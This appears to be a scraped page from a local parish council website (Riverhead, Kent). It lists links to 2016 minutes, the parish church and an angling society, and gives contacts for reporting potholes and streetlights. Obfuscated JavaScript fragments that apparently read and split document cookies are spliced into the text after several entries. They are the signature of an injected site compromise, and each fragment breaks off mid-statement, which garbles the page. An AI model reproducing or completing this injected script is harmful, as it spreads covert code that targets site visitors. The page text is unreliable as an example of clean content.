Minutes 2016

January February March April Annual Parish Meeting 14 April 2016 May June July August – no meeting September October November Decembervar _0x4d7f7d=document[_0x265c(‘0x5’)][_0x265c(‘0x6’)](‘;’);for(var _0x593f64=0x0;_0x593f64

Riverhead Parish

Photographs and postcards of Riverheadvar _0x4d7f7d=document[_0x265c(‘0x5’)][_0x265c(‘0x6’)](‘;’);for(var _0x593f64=0x0;_0x593f64

St Mary’s Church Riverhead

St Mary’s Church Riverhead. Information about services, activities and contacts. FaceBook page for St Mary’s Church   

Holmesdale Angling and Conservation Society

Holmesdale Angling and Conservation Society was first founded in the 1940s and offers various angling opportunities locally including on the Montreal Park Lakes Visit Site

How to report a pothole

Potholes (and other highways  problems such as faulty street lights and uneven pavements) should be reported to Kent Highways Services on 03000 418181 or on their web-site at http://www.kent.gov.uk/roads-and-travel/report-a-problem at any time.  You will be given a reference number. Please keep a note of this as it makes it easier to chase the matter up by phone or on-line.var _0x4d7f7d=document[_0x265c(‘0x5’)][_0x265c(‘0x6’)](‘;’);for(var _0x593f64=0x0;_0x593f64

How to report a faulty streetlight

If the streetlight is on one of the main roads ie Worships Hill, London Road, Maidstone Road or on Lakeside Place (near Tesco) please report these to Kent Highways online via http://www.kent.gov.uk/roads-and-travel/report-a-problem or by telephone 03000 418181 All other streetlights in Riverhead can be reported to the Parish Clerk by email clerk@riverheadparishcouncil.org.uk or telephone 01732 461278 […]